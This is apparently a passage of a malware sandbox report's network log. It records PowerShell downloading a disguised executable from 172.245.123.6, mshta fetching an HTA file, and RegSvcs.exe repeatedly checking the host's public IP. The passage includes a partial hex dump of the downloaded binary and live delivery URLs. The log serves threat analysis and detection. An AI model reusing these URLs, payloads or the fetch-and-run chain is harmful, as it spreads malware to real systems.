                                                                                  Sep 30, 2024 10:12:22.725541115 CEST1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                  Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  2192.168.2.2249167172.245.123.6803736C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:12:30.933979988 CEST335OUTGET /770/dllhost.exe HTTP/1.1
                                                                                  Accept: */*
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  Host: 172.245.123.6
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:12:31.423973083 CEST1236INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:30 GMT
                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                  Last-Modified: Mon, 30 Sep 2024 05:51:09 GMT
                                                                                  ETag: "fb241-6234fca9f391a"
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 1028673
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: application/lnk
                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 82 c1 ed 69 e3 af be 69 e3 af be 69 e3 af be d4 ac 39 be 6b e3 af be 60 9b 3a be 77 e3 af be 60 9b 2c be db e3 af be 60 9b 2b be 50 e3 af be 4e 25 c2 be 63 e3 af be 4e 25 d4 be 48 e3 af be 69 e3 ae be 64 e1 af be 60 9b 20 be 2f e3 af be 77 b1 3a be 6b e3 af be 77 b1 3b be 68 e3 af be 69 e3 38 be 68 e3 af be 60 9b 3e be 68 e3 af be 52 69 63 68 69 e3 af be 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 87 cf 93 4b 00 00 00 00 00 00 00 00 e0 00 23 01 0b 01 09 00 00 02 08 00 00 d6 01 00 00 00 00 00 10 63 01 00 00 10 00 00 00 20 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 [TRUNCATED]
                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-iii9k`:w`,`+PN%cN%Hid` /w:kw;hi8h`>hRichiPELK#c @P5!@@<T @.text `.rdata\ @@.datah@.rsrcH@@
                                                                                  Sep 30, 2024 10:12:31.423988104 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: 38rItChPT$RrI!rI$QjD$D$D$$HF$S3;JF,^$;J^,^0^4
                                                                                  Sep 30, 2024 10:12:31.423999071 CEST448INData Raw: 0f 85 54 ae 02 00 8b 94 24 18 02 00 00 8d 04 24 50 8d 4c 24 08 51 68 04 01 00 00 52 ff 15 20 23 48 00 8d 44 24 04 50 b8 e8 7f 4a 00 e8 48 0d 00 00 8b 0c 24 51 b8 d8 7f 4a 00 e8 3a 0d 00 00 8b 04 24 33 d2 66 89 50 fe 66 39 54 24 08 0f 84 11 ae 02
                                                                                  Data Ascii: T$$PL$QhR #HD$PJH$QJ:$3fPf9T$T$RJ$J3@t3SUVWD$D$,D$0D$$D$ D$D$(D$`D$dD$hD$iD$TD$XD$\D$]D$HD$LD$PD$QD$xD$|$
                                                                                  Sep 30, 2024 10:12:31.424009085 CEST1236INData Raw: 4a 04 66 83 79 08 7f 0f 85 15 9a 02 00 83 6c 24 30 01 0f 85 be 9a 02 00 8b 54 24 18 8b 44 24 1c 8b 4c 24 14 52 50 51 8b 5c 24 34 8b 7c 24 38 8b 74 24 2c 8b 54 24 30 e8 dd d2 00 00 85 c0 0f 84 19 ff ff ff e9 f9 99 02 00 8b 7c 24 34 33 c0 66 85 c0
                                                                                  Data Ascii: Jfyl$0T$D$L$RPQ\$4|$8t$,T$0|$43fttFG|$4fu>ufyu#9uD$D$D$8@|$8t$TD$L$4CDAfx#JfyOL$ L$|$<|$ED
                                                                                  Sep 30, 2024 10:12:31.424019098 CEST1236INData Raw: 24 28 bf ac 77 48 00 8d 74 24 38 c7 44 24 30 01 00 00 00 e8 5d 00 00 00 6a 01 8d 54 24 2c 52 8b c6 bf cc 7c 4a 00 e8 3a 27 00 00 8b ce e8 f3 0a 00 00 8b 85 2c 01 00 00 88 1d 94 72 49 00 89 9d f8 00 00 00 89 44 24 4c 3b c3 0f 85 42 cb 02 00 8d 74
                                                                                  Data Ascii: $(wHt$8D$0]jT$,R|J:',rID$L;Bt$(bw_^][8W_FF3FQmNTRWPjUCFU=
                                                                                  Sep 30, 2024 10:12:31.424030066 CEST1236INData Raw: 4a 00 e8 da e7 00 00 bf a8 47 48 00 8d 74 24 18 e8 8c fb ff ff 33 c0 8d 4d 01 8d 54 24 28 e8 ee f9 ff ff 8b ce e8 27 06 00 00 8d 74 24 28 e8 be 72 00 00 bf c0 47 48 00 8d 74 24 18 c7 44 24 30 01 00 00 00 89 6c 24 28 e8 54 fb ff ff 33 c0 b9 00 01
                                                                                  Data Ascii: JGHt$3MT$('t$(rGHt$D$0l$(T3T$(t$4L$QT$hR3l$XL$L$D$<t$VhGHSVhGH=VhHH'Vh<HH
                                                                                  Sep 30, 2024 10:12:31.424072027 CEST1236INData Raw: 2d 8b 40 04 8b 00 66 83 78 08 00 75 d0 8b 00 83 e8 0d 0f 84 d8 d2 02 00 83 e8 01 75 c0 85 f6 0f 85 c5 d2 02 00 49 b2 01 89 4c 24 50 eb af 8d 4c 24 28 e8 86 a2 00 00 83 f8 01 0f 84 4e d3 02 00 8b 44 24 10 83 78 08 08 0f 84 a8 d2 02 00 83 fb 05 0f
                                                                                  Data Ascii: -@fxuuIL$PL$(ND$xgt$mD$h\$D$ VD$Xt$Ac\$|lD$HL$LAML$8t$(\mt$Smt$hJmt$XAm_^][hD$
                                                                                  Sep 30, 2024 10:12:31.424082041 CEST1236INData Raw: 44 24 12 00 89 6c 24 18 c6 44 24 13 00 8b fd 8b f3 e8 63 f3 ff ff 0f b7 00 66 83 f8 20 0f 84 1d 7c 02 00 66 83 f8 09 0f 84 13 7c 02 00 8b c3 e8 35 01 00 00 8b 43 04 3b e8 0f 83 ba 00 00 00 8b 0b 8d 04 69 0f b7 00 8b 4c 24 14 66 85 c0 0f 84 c1 00
                                                                                  Data Ascii: D$l$D$cf |f|5C;iL$fEf t9ft3f"tfDL0AL$f8"{|$tjD$|$t3|$0t$ fTL0>t$3D$D$f tf7
                                                                                  Sep 30, 2024 10:12:31.424092054 CEST1236INData Raw: 8e dd 00 00 00 56 e8 99 e4 00 00 8b 44 24 40 83 c4 04 47 3b 78 08 72 d5 8b 54 24 3c 89 6a 08 66 39 2b 0f 84 fc 01 00 00 eb 0b 8d a4 24 00 00 00 00 8d 64 24 00 0f b7 04 6b 66 83 f8 20 0f 84 f7 00 00 00 66 83 f8 09 0f 84 ed 00 00 00 0f b7 04 6b 66
                                                                                  Data Ascii: VD$@G;xrT$<jf9+$d$kf fkfl$fl$f0f.fA*faf_ $=B(v)O"D&(4@$3@f0
                                                                                  Sep 30, 2024 10:12:31.424102068 CEST1236INData Raw: 7c 24 24 00 0f 84 06 83 02 00 8d 44 24 20 e8 ae f7 ff ff 8b 54 24 24 8b 44 24 20 52 50 ff 15 40 26 48 00 bf 32 00 00 00 8d 74 24 14 e8 b0 f7 ff ff 8d 74 24 20 8d 7c 24 14 e8 f3 f2 ff ff 57 e9 e3 fc ff ff 66 83 fe 7a 0f 86 96 fd ff ff e9 67 fb ff
                                                                                  Data Ascii: |$$D$ T$$D$ RP@&H2t$t$ |$WfzgVt$EVRt$EjVDkE=t$C>T$RzEf<k=t$BVmB1@1@2@1@g/@BI2@3@3
                                                                                  Sep 30, 2024 10:12:31.429549932 CEST1236INData Raw: 4a 00 53 40 83 f8 30 56 57 a3 d0 92 4a 00 0f 8d 67 80 02 00 8b 7d 0c b3 01 8d 44 24 28 c7 44 24 14 00 00 00 00 c6 44 24 10 01 88 5c 24 13 c6 44 24 11 00 e8 15 a1 00 00 8d 74 24 18 e8 3c e3 ff ff 56 b8 00 20 00 00 8d 4c 24 2c e8 5d a7 00 00 84 c0
                                                                                  Data Ascii: JS@0VWJg}D$(D$D$\$D$t$<V L$,]JD$L$|$;$Qh8#HT$lRD$tPhW #H$(Q$*R$PL$pQ$RD$dP$Q$R$P


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.2249172172.245.123.6803996C:\Windows\System32\mshta.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:12:43.793008089 CEST472OUTGET /xampp/crio/IEnetbokkworkingforupdate.hta HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US
                                                                                  UA-CPU: AMD64
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                  If-Modified-Since: Mon, 30 Sep 2024 01:35:50 GMT
                                                                                  Connection: Keep-Alive
                                                                                  Host: 172.245.123.6
                                                                                  If-None-Match: "1ceb0-6234c398c9718"
                                                                                  Sep 30, 2024 10:12:44.169147968 CEST275INHTTP/1.1 304 Not Modified
                                                                                  Date: Mon, 30 Sep 2024 08:12:43 GMT
                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                  Last-Modified: Mon, 30 Sep 2024 01:35:50 GMT
                                                                                  ETag: "1ceb0-6234c398c9718"
                                                                                  Accept-Ranges: bytes
                                                                                  Keep-Alive: timeout=5, max=100
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.2249173193.122.130.0803108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:12:46.688663006 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:12:47.158879042 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:47 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: f355aac84c90f7c51ab0b69d56d3c62c
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:47.368921995 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:47 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: f355aac84c90f7c51ab0b69d56d3c62c
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:47.789362907 CEST127OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 30, 2024 10:12:47.902633905 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:47 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: a500922a7b1264d5b50009795acd75e6
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:49.368849993 CEST127OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 30, 2024 10:12:49.472323895 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 2f279be893460547b44f4d65d7ff0361
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:49.716661930 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:49 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 2f279be893460547b44f4d65d7ff0361
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.2249176132.226.8.169803108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:12:50.202388048 CEST127OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 30, 2024 10:12:51.348546028 CEST272INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:51 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.2249178132.226.247.73803108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:12:52.019423008 CEST127OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Sep 30, 2024 10:12:52.694926977 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:52 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: dbb8b38f887e52174f67d83f666f4c38
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:52.904678106 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:52 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: dbb8b38f887e52174f67d83f666f4c38
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.2249180193.122.130.0803108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:12:53.454821110 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:12:53.906809092 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:53 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: eaefc4771e47cb4e5cb623f597a7e047
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:54.120743990 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:53 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: eaefc4771e47cb4e5cb623f597a7e047
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.2249182193.122.6.168803108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:12:55.063009977 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:12:55.697236061 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:55 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 4b74fb5aab6d6fa9d6dd67aaac284442
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:55.908642054 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:55 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 4b74fb5aab6d6fa9d6dd67aaac284442
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.2249184193.122.6.168803108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:12:57.102463007 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:12:57.759094000 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:57 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 9268c4bede93e4756e563bc2605faeb7
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                                                                  Sep 30, 2024 10:12:57.968663931 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:12:57 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
                                                                                  Pragma: no-cache
                                                                                  X-Request-ID: 9268c4bede93e4756e563bc2605faeb7
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  10192.168.2.2249186158.101.44.242803108C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 30, 2024 10:12:58.420878887 CEST151OUTGET / HTTP/1.1
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                  Host: checkip.dyndns.org
                                                                                  Connection: Keep-Alive
                                                                                  Sep 30, 2024 10:13:00.417362928 CEST320INHTTP/1.1 200 OK
                                                                                  Date: Mon, 30 Sep 2024 08:13:00 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 103
                                                                                  Connection: keep-alive
                                                                                  Cache-Control: no-cache
